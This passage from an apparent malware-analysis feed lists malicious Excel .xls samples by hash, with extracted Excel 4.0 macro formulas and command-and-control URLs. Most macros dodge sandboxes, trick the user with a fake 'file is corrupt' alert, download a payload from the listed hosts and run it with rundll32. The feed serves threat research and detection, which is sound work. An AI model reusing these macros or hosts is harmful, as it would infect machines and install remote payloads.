corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"IddQ2riyJg\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7b34cc2097d74ec98a917c7191fcf00a3f9e9595589bc5d7252f3e530f97c3c7"},"analysis":{"reported":"2020-04-09T16:17:13Z","score":10},"files":[{"filename":"7b34cc2097d74ec98a917c7191fcf00a3f9e9595589bc5d7252f3e530f97c3c7","filesize":168960,"md5":"5a006b37288ea13eec067d5abce0fc9b","sha1":"d598ead47ca2fb87f1e6d02447706ca8543900a4","sha256":"7b34cc2097d74ec98a917c7191fcf00a3f9e9595589bc5d7252f3e530f97c3c7","sha512":"47f6141c17c221506a06b657eea66bd98c568124e39dc32c81a48740dd079384564f03851447d970a7603de15c9624a454b0c653335d41899fba6f63776458aa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7b34cc2097d74ec98a917c7191fcf00a3f9e9595589bc5d7252f3e530f97c3c7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Ad915IsyyQ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7b380a2de217bb4f7cddc3022ef75b380ab60b8dfa6e7eb99546b9377cd88990"},"analysis":{"reported":"2020-04-09T16:17:14Z","score":10},"files":[{"filename":"7b380a2de217bb4f7cddc3022ef75b380ab60b8dfa6e7eb99546b9377cd88990","filesize":207360,"md5":"5edce49750ce588198242cf2204b4f5f","sha1":"d346ee2c7917dcadb559066473d7f7ad3f7e587c","sha256":"7b380a2de217bb4f7cddc3022ef75b380ab60b8dfa6e7eb99546b9377cd88990","sha512":"a33641047288bc353fdf0be862eb9003736e42f507f622b78dc78345568d809c76c656c0f2d564fedea4874b822ca1473cd51e9881ffe63592fd4b5a7fa97f8b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7b380a2de217bb4f7cddc3022ef75b380ab60b8dfa6e7eb99546b9377cd88990.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://greentec-automation.com/wp-crun.php","https://narensyndicate.com/wp-crun.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://greentec-automation.com/wp-crun.php\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://narensyndicate.com/wp-crun.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"yQWPOZOktk\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7b3ddf6992ccee5dd13be936abb9192259c13ada21509b11da8b8f8699af6cc6"},"analysis":{"reported":"2020-04-09T16:17:14Z","score":10},"files":[{"filename":"7b3ddf6992ccee5dd13be936abb9192259c13ada21509b11da8b8f8699af6cc6","filesize":206336,"md5":"729ec00af4c124c1e527a5e71ccb633b","sha1":"49561695e8effc8a6ce8c3e80fe59c2f94f20b96","sha256":"7b3ddf6992ccee5dd13be936abb9192259c13ada21509b11da8b8f8699af6cc6","sha512":"93e52b9b75732cc55debc08d6701b078037540d9ccae0771b8a944c8833a6fc9656b8fd1f2d6f36519accf80ef10fc92676431d04910b7710eeb7b69a64bbe83","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7b3ddf6992ccee5dd13be936abb9192259c13ada21509b11da8b8f8699af6cc6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Vl3CODxno8\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7b5e8546c829682a4e812f41ff80399b8cf8a398f3bc5df1fcd827abd4ea2377"},"analysis":{"reported":"2020-04-09T16:17:14Z","score":10},"files":[{"filename":"7b5e8546c829682a4e812f41ff80399b8cf8a398f3bc5df1fcd827abd4ea2377","filesize":167936,"md5":"4be9a477e227f1af15bfb6dae5473192","sha1":"10aad7f5904200e1df3553f18b3870ed58caf785","sha256":"7b5e8546c829682a4e812f41ff80399b8cf8a398f3bc5df1fcd827abd4ea2377","sha512":"ac9b2f272e6379068c31c4e66c425df081cfaeb1dc06e304aebf8124f29260763b2979e4d0777a088c1c55b43ed59bf9a082be99be5df05aa8029ec81fde9c1a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7b5e8546c829682a4e812f41ff80399b8cf8a398f3bc5df1fcd827abd4ea2377.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"lp3svkfzOW\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7b626a292381a6fa94001737e01e6c678c8f357bd4ffafe68ce151f8b70a9345"},"analysis":{"reported":"2020-04-09T16:17:14Z","score":10},"files":[{"filename":"7b626a292381a6fa94001737e01e6c678c8f357bd4ffafe68ce151f8b70a9345","filesize":144896,"md5":"28e4cd22260b5fe557385972974aecf8","sha1":"c0304a791d6081a1b32abd0a99259c961bcad9f6","sha256":"7b626a292381a6fa94001737e01e6c678c8f357bd4ffafe68ce151f8b70a9345","sha512":"bb3d8114ce84c097158c794ec41f175b52d2a257efba6bd5f5552a6d792292c90c4523c11413a41873f99ac51725609a898158f5d45a50d642cb81aa786004b0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7b626a292381a6fa94001737e01e6c678c8f357bd4ffafe68ce151f8b70a9345.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/1451345341fff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7b6e48cc9a21a460a7cefd5ac91c7e949ce7c9ed45ae3a4019d1cdb3ac156f86"},"analysis":{"reported":"2020-04-09T16:17:14Z","score":10},"files":[{"filename":"7b6e48cc9a21a460a7cefd5ac91c7e949ce7c9ed45ae3a4019d1cdb3ac156f86","filesize":116224,"md5":"12c8b646397f6b45a82dd05c99437845","sha1":"5a1564ed58d95790765c54cac421eede32085f23","sha256":"7b6e48cc9a21a460a7cefd5ac91c7e949ce7c9ed45ae3a4019d1cdb3ac156f86","sha512":"2d5c999c9fb6bb2d4ab1d1ba3b6b36a7876f20af6ac6d1dbe5f72e8684a0d01730d27846b7d62a085486f8ce1c2aee2d18bdfbca860373313ffdcc341bce86fc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7b6e48cc9a21a460a7cefd5ac91c7e949ce7c9ed45ae3a4019d1cdb3ac156f86.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"m7jgZeIXCL\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7b6ef90aac4acf3b5cddb81ce4cdeb63da17265822750434e5ffccb08bf9dc3f"},"analysis":{"reported":"2020-04-09T16:17:14Z","score":10},"files":[{"filename":"7b6ef90aac4acf3b5cddb81ce4cdeb63da17265822750434e5ffccb08bf9dc3f","filesize":104448,"md5":"36aa8eb58c6fac5e5119915e43f09da1","sha1":"4f04ce0dfa0aa81669ca3cf3f5a1b2582085326f","sha256":"7b6ef90aac4acf3b5cddb81ce4cdeb63da17265822750434e5ffccb08bf9dc3f","sha512":"5bf673dd77312c3b087754933883ba3bebd61c514e4ff89a75be7ad66ff532611c685ee80445f9c3c581a23b94648b9ca9ef14c260ecfb9602555dd17537d6f0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7b6ef90aac4acf3b5cddb81ce4cdeb63da17265822750434e5ffccb08bf9dc3f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"fGjr6Q3tDW\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7b790d9f7e344a06e6edbf71c8b13f6a28d627371a8380eb67995eb390d84538"},"analysis":{"reported":"2020-04-09T16:17:14Z","score":10},"files":[{"filename":"7b790d9f7e344a06e6edbf71c8b13f6a28d627371a8380eb67995eb390d84538","filesize":168448,"md5":"7c24366682bcbeeca64d07cc8b6c9ce1","sha1":"ae543bf9c46db52f1edda0886a55347828686026","sha256":"7b790d9f7e344a06e6edbf71c8b13f6a28d627371a8380eb67995eb390d84538","sha512":"0e0c3c7043cc88a79db886451857b1fed62451a0c03517ef820ff394b9028af6a38ed8b3f2a0605a248e362b2b48e4c88ae788835b3051650090a4edb3166134","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7b790d9f7e344a06e6edbf71c8b13f6a28d627371a8380eb67995eb390d84538.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"lLIpI8XdyO\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7b839e04c35f7ae82c3cf0819b7afa77f60094fc4fb9ac51ebed99b83887b04d"},"analysis":{"reported":"2020-04-09T16:17:14Z","score":10},"files":[{"filename":"7b839e04c35f7ae82c3cf0819b7afa77f60094fc4fb9ac51ebed99b83887b04d","filesize":170496,"md5":"e8ce0b99048411429efd1968fdfef54e","sha1":"5d9edb153200d484ec523b692b184bb58990eda6","sha256":"7b839e04c35f7ae82c3cf0819b7afa77f60094fc4fb9ac51ebed99b83887b04d","sha512":"95691eb15ed6a1d90346a5b2071d1275ee0e98626e1af33dcef2781f065fe81a84b386d5596cfda9b31886c9e63dbe1448a1eab6a9185b3ac371de40cbfa3603","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7b839e04c35f7ae82c3cf0819b7afa77f60094fc4fb9ac51ebed99b83887b04d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"TwWjEoadpq\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7b90a4260272b5c27b7fcb2bdefbdfe5c07f3e331d2518dc348bd887d761c65e"},"analysis":{"reported":"2020-04-09T16:17:14Z","score":10},"files":[{"filename":"7b90a4260272b5c27b7fcb2bdefbdfe5c07f3e331d2518dc348bd887d761c65e","filesize":168448,"md5":"b77e65ffecae77c0627997c1eed0d01c","sha1":"8877bc86dad58c48174d2211c2131d9cbbc1d35f","sha256":"7b90a4260272b5c27b7fcb2bdefbdfe5c07f3e331d2518dc348bd887d761c65e","sha512":"89ae091bf3c3eb33c9430cc25477e7e3398f309d09e88c9d860fb518cb9b2a623ee15fe3abc8702c02c1eebae4434e40aab851af41cba3306827ea007baa59c0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7b90a4260272b5c27b7fcb2bdefbdfe5c07f3e331d2518dc348bd887d761c65e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dYEIj8a5rL\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7b970d4c9d1036c1f531401708ba1c17e636303186cb044ff028272bfef43db1"},"analysis":{"reported":"2020-04-09T16:17:14Z","score":10},"files":[{"filename":"7b970d4c9d1036c1f531401708ba1c17e636303186cb044ff028272bfef43db1","filesize":113664,"md5":"922ea1a5105aaccb4270504edc72c3e0","sha1":"703f29077b32efbf74b2a37dcdb9913bef895ede","sha256":"7b970d4c9d1036c1f531401708ba1c17e636303186cb044ff028272bfef43db1","sha512":"745041ade12d9aa8da8217e14a7b2b0ab4ca2c9f3e38a3ef9e0aa106beff379e365cc94c0437a853cbc5409900ae060f989558e86b28664e19320bd1cf58f529","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7b970d4c9d1036c1f531401708ba1c17e636303186cb044ff028272bfef43db1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"a2bBUnc25e\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7b9e2f4c298ae277438627a7d44927e4dbf6f64903b43dbe6f138c0d4a4370d7"},"analysis":{"reported":"2020-04-09T16:17:14Z","score":10},"files":[{"filename":"7b9e2f4c298ae277438627a7d44927e4dbf6f64903b43dbe6f138c0d4a4370d7","filesize":167936,"md5":"a241044c2f1941af738b01dcd53ce03c","sha1":"8649ea1725aa8d52433043baf3270a5707787fe0","sha256":"7b9e2f4c298ae277438627a7d44927e4dbf6f64903b43dbe6f138c0d4a4370d7","sha512":"40bdf12a9ef10519c01fad37205b9e62e85b76a0d7cb2afdfd9686391728ba9d387edfffc458382de7b221c8ecf406d08c7c43f5ba70f770447ff9c6c3e19eaa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7b9e2f4c298ae277438627a7d44927e4dbf6f64903b43dbe6f138c0d4a4370d7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3jHvW60njL\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7bb33ddadc7e7e7f596444b5572745f724ab52c773035c3ccebdb97fb41888d4"},"analysis":{"reported":"2020-04-09T16:17:15Z","score":10},"files":[{"filename":"7bb33ddadc7e7e7f596444b5572745f724ab52c773035c3ccebdb97fb41888d4","filesize":185344,"md5":"4ae79bf2377efd1fe91c10f3099ba692","sha1":"19efef89d8d447e6a2687c386c0d76de1774e787","sha256":"7bb33ddadc7e7e7f596444b5572745f724ab52c773035c3ccebdb97fb41888d4","sha512":"08e9a9b876aa4eebab23344a1933b68905d0e787e10433c1d6d5d84a2f7baf10c0a489b9100e8b7dfb0162a0660433d4cf0b6f6b5c18d1cea36fab38d15b6b29","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7bb33ddadc7e7e7f596444b5572745f724ab52c773035c3ccebdb97fb41888d4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7becac6a28b7f5e8e8945c65e4716c54e4203f8827db1a745ffa99ae8b9bb23f"},"analysis":{"reported":"2020-04-09T16:17:15Z","score":10},"files":[{"filename":"7becac6a28b7f5e8e8945c65e4716c54e4203f8827db1a745ffa99ae8b9bb23f","filesize":112128,"md5":"1651af2ee34598eb4cc5fd5c3f28f287","sha1":"5185f90a46d1276f2b7a755216f80c513d6580df","sha256":"7becac6a28b7f5e8e8945c65e4716c54e4203f8827db1a745ffa99ae8b9bb23f","sha512":"00feb24c0cd192714cfde97366053e5affb8fe21890024375b201ed4e2d3378388a9a1361befad6853dfa8363b340d2acd5f3dfe4730c625c6bdb2c68f70471b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7becac6a28b7f5e8e8945c65e4716c54e4203f8827db1a745ffa99ae8b9bb23f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7c0f0a78fdfb4e2a166112489c573ff48169c9a0fa49de35e28e322adb3b2622"},"analysis":{"reported":"2020-04-09T16:17:15Z","score":10},"files":[{"filename":"7c0f0a78fdfb4e2a166112489c573ff48169c9a0fa49de35e28e322adb3b2622","filesize":206336,"md5":"4192579e0576812e2bc48b8a5b04e27b","sha1":"c87f5ea061028031031e0e8f4a051ac01cec5c5f","sha256":"7c0f0a78fdfb4e2a166112489c573ff48169c9a0fa49de35e28e322adb3b2622","sha512":"6e5abe17005d7efb65750c0caf76168d2d76dbdd0f533cac11221b09d1c93255601ee1bc5b61f3b9a4400830179b08450a101f00d822db3fe24dbc8b9ddd6261","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7c0f0a78fdfb4e2a166112489c573ff48169c9a0fa49de35e28e322adb3b2622.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's 